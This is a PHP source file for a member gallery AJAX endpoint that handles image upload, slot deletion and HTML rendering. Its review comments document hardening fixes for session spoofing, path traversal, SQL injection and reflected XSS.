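<?php
/**
 * Member gallery AJAX endpoint.
 *
 * Handles three POST actions, checked in this order:
 *   1. upload  - $_FILES['gallery_image'] + $_POST['select_gallery_no']:
 *                replace the image in one gallery slot, answer "ok::<html>"
 *                or "error::<message>", then exit.
 *   2. delete  - $_POST['delId']: empty one gallery slot, answer "ok::<html>".
 *   3. render  - $_POST['getDisplayGallery']: render a "::"-separated gallery
 *                string as an HTML table.
 *
 * The member row stores the gallery as file names joined with "::".
 */
include("../include/config.php");
include("../include/connect.php");
$startFunctionDefault = 'no';
include("../include/function.php");
header("Content-Type: text/html; charset=utf-8");
include("../include/blockMember.php");

// SECURITY: the previous revision copied $_POST['current_login_member_id'] into
// $_SESSION['s_member_id'] at this point. That let any client choose which
// member it acts as (and put request data straight into the SQL below), so the
// override is gone: the acting member is whatever the login code stored in the
// session. NOTE(review): if an uploader client cannot send the session cookie,
// give it a signed, short-lived token to present instead of a bare member id.

/**
 * Return the logged-in member id for use inside a quoted SQL literal.
 *
 * Stops the request with 403 when no member id is in the session or when the
 * value contains a quote, backslash or NUL byte.
 *
 * NOTE(review): this is a reject-list, not real escaping. sql_query() is
 * defined elsewhere; switch these queries to bound parameters once its driver
 * is confirmed to support them.
 *
 * @return string
 */
function galleryMemberId()
{
    $member_id = '';
    if (isset($_SESSION['s_member_id']) && is_scalar($_SESSION['s_member_id'])) {
        $member_id = (string) $_SESSION['s_member_id'];
    }
    if ($member_id === '' || preg_match('/[\'"\\\\\\x00]/', $member_id)) {
        header('HTTP/1.1 403 Forbidden');
        exit();
    }
    return $member_id;
}

/**
 * Normalise a client-supplied gallery slot number.
 *
 * @param mixed $raw Value taken from the request.
 * @return int|null Non-negative slot index, or null when $raw is not a plain
 *                  decimal number (at most 9 digits, so the cast cannot
 *                  overflow a 32-bit int).
 */
function gallerySlotIndex($raw)
{
    if (is_int($raw)) {
        return $raw >= 0 ? $raw : null;
    }
    if (is_string($raw) && preg_match('/^[0-9]{1,9}$/', $raw)) {
        return (int) $raw;
    }
    return null;
}

/**
 * Delete the image files of one gallery slot of the logged-in member.
 *
 * Reads the member's gallery string, removes the full-size and thumbnail
 * files of the slot (if it holds an image) and blanks the slot. The database
 * row is NOT updated here; the caller persists the returned array.
 *
 * @param mixed $index Slot number; anything that is not a plain non-negative
 *                     number leaves the gallery untouched.
 * @return array Gallery slots (file names, '' for an empty slot).
 */
function delGalleryImg($index)
{
    $sql = " SELECT gallery_image FROM member WHERE member_id = '" . galleryMemberId() . "' ";
    $query = sql_query($sql);
    $rec = sql_fetch_array($query);
    $stored = (is_array($rec) && isset($rec['gallery_image'])) ? (string) $rec['gallery_image'] : '';
    $a_image = explode('::', $stored);

    $slot = gallerySlotIndex($index);
    if ($slot !== null && isset($a_image[$slot]) && $a_image[$slot] != '') {
        // basename() keeps a tampered stored value from pointing unlink()
        // outside the two gallery directories.
        $file = basename($a_image[$slot]);
        @unlink('../uploads/gallery_image/full/' . $file);
        @unlink('../uploads/gallery_image/thumb/' . $file);
        $a_image[$slot] = '';
    }
    return $a_image;
}

/**
 * Persist the gallery slots of the logged-in member.
 *
 * @param array $a_image Gallery slots as returned by delGalleryImg().
 * @return string The "::"-joined gallery string that was written.
 */
function saveGalleryImg($a_image)
{
    $gallery_image = implode('::', $a_image);
    // File names are generated server-side, so a quote, backslash or NUL here
    // means tampered data; refuse to build the statement with it.
    if (preg_match('/[\'"\\\\\\x00]/', $gallery_image)) {
        header('HTTP/1.1 400 Bad Request');
        exit();
    }
    $sql = " UPDATE member SET gallery_image = '" . $gallery_image . "' WHERE member_id = '" . galleryMemberId() . "' ";
    sql_query($sql);
    return $gallery_image;
}

/**
 * Render a "::"-separated gallery string as a one-row HTML table.
 *
 * Empty slots show a placeholder image; filled slots show the thumbnail and a
 * delete control that calls the page's delGallery() JavaScript function.
 *
 * @param string $gallery_image Gallery string; may come from the request, so
 *                              every file name is HTML-escaped.
 * @return string HTML markup.
 */
function displayGalleryImg($gallery_image)
{
    // explode() always yields at least one element, so the table is always built.
    $a_image = explode('::', $gallery_image);
    $output = '<table width="100%" border="0" cellspacing="0" cellpadding="0" id="tbl-gallery-image"><tr>';
    foreach ($a_image as $key => $img) {
        if ($img == '') {
            $srcImg = '/images/gender/color_14.gif';
            $text_del = '';
        } else {
            // Escaping stops a crafted gallery string from breaking out of the
            // src attribute (reflected XSS through getDisplayGallery).
            $srcImg = '/uploads/gallery_image/thumb/' . htmlspecialchars(basename($img), ENT_QUOTES, 'UTF-8');
            $text_del = '<div onclick="delGallery(\'' . $key . '\')" style="cursor:pointer; color:#000000;">ลบ</div>';
        }
        $output .= '<td style="padding:0 3px 0 0; text-align:center;" valign="top"><img src="' . $srcImg . '" id="gallery-image-' . $key . '" border="0">' . $text_del . '</td>';
    }
    // Each cell is already closed inside the loop; the old stray "</td>" is dropped.
    $output .= '</tr></table>';
    return $output;
}

// ---- 1. upload -------------------------------------------------------------
$upload_tmp = (isset($_FILES['gallery_image']['tmp_name']) && is_string($_FILES['gallery_image']['tmp_name']))
    ? $_FILES['gallery_image']['tmp_name']
    : '';
$upload_slot = (isset($_POST['select_gallery_no']) && is_string($_POST['select_gallery_no']))
    ? $_POST['select_gallery_no']
    : '';

if (($upload_tmp !== '') && ($upload_slot !== '')) {
    $uploadError = 'error::รูปภาพที่อนุญาติให้ upload ได้คือ .jpg, .png, .gif \nและขนาดไม่เกิน ' . ($configMemberPostSize/1024) . ' Kb เท่านั้น';

    // The extension comes from the client-chosen name; it only selects the
    // stored suffix. The content check below is what proves it is an image.
    $aType = explode('.', (string) $_FILES['gallery_image']['name']);
    $type = $aType[(count($aType)-1)];
    if (!in_array($type, array('jpg', 'gif', 'png'), true)) {
        echo $uploadError;
        exit();
    }

    if ($_FILES['gallery_image']['size'] > $configMemberPostSize) {
        echo $uploadError;
        exit();
    }

    // Only accept a file PHP itself received in this request, and only if its
    // bytes decode as one of the three allowed image formats.
    $imageInfo = is_uploaded_file($upload_tmp) ? @getimagesize($upload_tmp) : false;
    if ($imageInfo === false || !in_array($imageInfo[2], array(IMAGETYPE_JPEG, IMAGETYPE_GIF, IMAGETYPE_PNG), true)) {
        echo $uploadError;
        exit();
    }

    // Validate the slot before anything is deleted or written.
    $select_gallery_no = gallerySlotIndex(str_replace('gallery-image-', '', $upload_slot));
    if ($select_gallery_no === null) {
        header('HTTP/1.1 400 Bad Request');
        exit();
    }

    $a_image = delGalleryImg($select_gallery_no);

    // full-size copy
    $input_file_path = '../uploads/gallery_image/full/';
    $input_file_name = check_file_in_path($type, $input_file_path, 6);
    $width = $configGalleryImgFullWidth;
    $quality = 100;
    $actionFix = 'width';
    uploadfile2($input_file_path, $input_file_name, $upload_tmp, $width, $quality, $actionFix);

    // thumbnail
    $input_file_path = '../uploads/gallery_image/thumb/';
    $nw = $configGalleryImgThumbWidth;
    $nh = $configGalleryImgThumbHeight;
    $dest = $input_file_path . $input_file_name;
    cropImage($nw, $nh, $upload_tmp, $type, $dest);

    $a_image[$select_gallery_no] = $input_file_name;
    $gallery_image = saveGalleryImg($a_image);

    echo 'ok::' . displayGalleryImg($gallery_image);
    exit();
}

// ---- 2. delete -------------------------------------------------------------
$del_id = isset($_POST['delId']) ? $_POST['delId'] : '';
if ($del_id !== '') {
    // delGalleryImg() ignores anything that is not a plain slot number.
    $a_image = delGalleryImg($del_id);
    $gallery_image = saveGalleryImg($a_image);

    echo 'ok::' . displayGalleryImg($gallery_image);
}

// ---- 3. render -------------------------------------------------------------
$display_raw = isset($_POST['getDisplayGallery']) ? $_POST['getDisplayGallery'] : '';
if (is_string($display_raw) && $display_raw !== '') {
    echo displayGalleryImg($display_raw);
}
?>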